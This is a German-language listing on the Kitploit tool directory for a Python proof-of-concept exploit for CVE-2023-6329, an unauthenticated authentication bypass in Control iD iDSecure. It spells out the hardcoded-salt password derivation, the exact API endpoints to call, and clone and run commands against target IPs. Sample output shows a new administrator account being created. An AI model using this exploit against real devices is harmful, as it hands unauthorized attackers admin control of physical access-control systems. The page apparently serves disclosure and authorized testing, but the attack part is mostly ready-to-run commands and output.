Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-6329 — CVE-2023-6329 – Proof-of-Concept für Authentifizierungsumgehung für Control iD iDSecure ≤ 4.7.43.0 | Kitploit
Tools/GitHubGitHub/itzvenom/cve-2023-6329
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubitzvenom/cve-2023-6329

CVE-2023-6329

CVE-2023-6329 – Proof-of-Concept für Authentifizierungsumgehung für Control iD iDSecure ≤ 4.7.43.0

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-6329 — Umgehung der Authentifizierung bei Control iD iDSecure

Python CVE Severity Affected

Ein Python Proof-of-Concept-Exploit für CVE-2023-6329, eine Schwachstelle durch unzureichende Zugriffskontrolle in Control iD iDSecure Versionen 4.7.43.0 und niedriger. Der Fehler ermöglicht es einem nicht authentifizierten entfernten Angreifer, gültige Anmeldeinformationen zu rekonstruieren, indem er einen vorhersagbaren Passwort-Ableitungsalgorithmus ausnutzt, der vollständig auf öffentlich zugänglichen Werten basiert – einer Geräteseriennummer, einem vom Server bereitgestellten Nonce und einem fest codierten Salt. Nach der Authentifizierung kann der Angreifer einen neuen Administrator-Benutzer über die Weboberfläche erstellen.

In Python umgesetzt basierend auf dem ursprünglichen Metasploit-Modul von Michael Heinzl. Die ursprüngliche Schwachstelle wurde von Tenable entdeckt und veröffentlicht.

Haftungsausschluss: Dieses Tool wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch. Führen Sie es nur gegen Systeme aus, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.


Inhaltsverzeichnis

  • Einzelheiten zur Schwachstelle
  • Funktionsweise
  • Anforderungen
  • Installation
  • Verwendung
  • Beispielausgabe
  • Referenzen

Einzelheiten zur Schwachstelle

Grundursache

Die Anmelderoutine in iDS-Core.dll stellt einen alternativen Authentifizierungspfad über einen passwordCustom-Parameter bereit. Der Wert für diesen Parameter wird mit einem vorhersagbaren Algorithmus abgeleitet, der die Seriennummer des Geräts (öffentlich ohne Authentifizierung abrufbar) zusammen mit einem vom Aufrufer bereitgestellten Nonce und einem fest codierten Salt-String (cid2016) kombiniert. Da jeder Bestandteil der Berechnung entweder vom Angreifer kontrolliert oder frei verfügbar ist, kann jeder entfernte Angreifer einen gültigen passwordCustom-Wert berechnen und sich als Administrator anmelden.

Nach erfolgreicher Authentifizierung über diesen Pfad setzt der Server das Passwort des admin-Kontos auf admin zurück oder erstellt dieses Konto, falls es noch nicht existiert.


Funktionsweise

Der Exploit durchläuft fünf Schritte:

1. Versionsprüfung – Der Endpunkt /api/util/configUI gibt eine 401-Antwort mit der Softwareversion zurück, was bestätigt, ob das Ziel eine verwundbare Version ausführt.

2. Abrufen der Entsperrdaten – Ein GET-Request an /api/login/unlockGetData gibt die serial-Nummer des Geräts und einen passwordRandom-Nonce zurück. Dieser Endpunkt erfordert keine Authentifizierung.

3. Berechnung von passwordCustom – Der folgende Algorithmus wird angewendet, um die Umgehungsanmeldeinformationen abzuleiten:

root@kitploit:~
sha1_hash      = SHA1(serial)
combined       = sha1_hash + passwordRandom + "cid2016"
sha256_hash    = SHA256(combined)
passwordCustom = int(sha256_hash[0:6], 16)   # erste 6 Hex-Zeichen → dezimal

4. Authentifizieren und ein JWT erhalten – Der berechnete passwordCustom und passwordRandom werden per POST an /api/login/ gesendet, was ein gültiges JWT accessToken mit Administratorrechten zurückgibt.

5. Neuen Administrator-Benutzer erstellen – Mit dem JWT wird ein POST an /api/operator/ gesendet, um ein neues Operator-Konto mit idType: 1 (Administratorrolle) zu registrieren.


Anforderungen

  • Python 3.8 oder höher
  • Bibliothek requests

Installation

root@kitploit:~
git clone https://github.com/itzvenom/CVE-2023-6329.git
cd CVE-2023-6329
pip install requests

Verwendung

root@kitploit:~
python3 exploit.py --host <TARGET_IP> [Optionen]

Beispiele

Einfache Nutzung gegen ein Ziel auf dem Standard-Port:

root@kitploit:~
python3 exploit.py --host 192.168.1.100

Benutzerdefinierte Anmeldeinformationen für das neue Admin-Konto angeben:

root@kitploit:~
python3 exploit.py --host 192.168.1.100 --username ctfadmin --password S3cr3tPass!

Ziel, das auf einem nicht standardmäßigen Port ohne SSL läuft:

root@kitploit:~
python3 exploit.py --host 192.168.1.100 --port 8080 --no-ssl

Beispielausgabe

root@kitploit:~
[*] Target: https://192.168.1.100:30443
============================================================
[*] Target version: 4.7.32.0
[+] Target appears VULNERABLE.
[+] passwordRandom : 2948271034
[+] serial         : ABC123XYZ
[*] Computed passwordCustom: 8301745
[+] JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
[+] User 'ctfadmin' created successfully.
[+] Verified! New credentials work.
[+] Login at: https://192.168.1.100:30443/#/login
    Username : ctfadmin
    Password : S3cr3tPass!

Referenzen

  • Tenable TRA-2023-36 — Ursprünglicher Hinweis
  • NVD — CVE-2023-6329
  • Metasploit-Modul — auxiliary/admin/http/idsecure_auth_bypass
Tool herunterladen
FeldDetails
CVE-IDCVE-2023-6329
Betroffenes ProduktControl iD iDSecure
Betroffene Versionen≤ 4.7.43.0
SchwachstellentypUnzureichende Zugriffskontrolle (CWE-284)
AngriffsvektorNetzwerk (nicht authentifiziert)
Offenlegungsdatum27. November 2023
Entdeckt vonTenable
ArgumentStandardwertBeschreibung
--host(erforderlich)Ziel-IP-Adresse oder Hostname
--port30443Ziel-Port
--usernamepwned_adminBenutzername für das neue Admin-Konto
--passwordPwned1234!Passwort für das neue Admin-Konto
--no-sslFalseHTTPS deaktivieren (reines HTTP verwenden)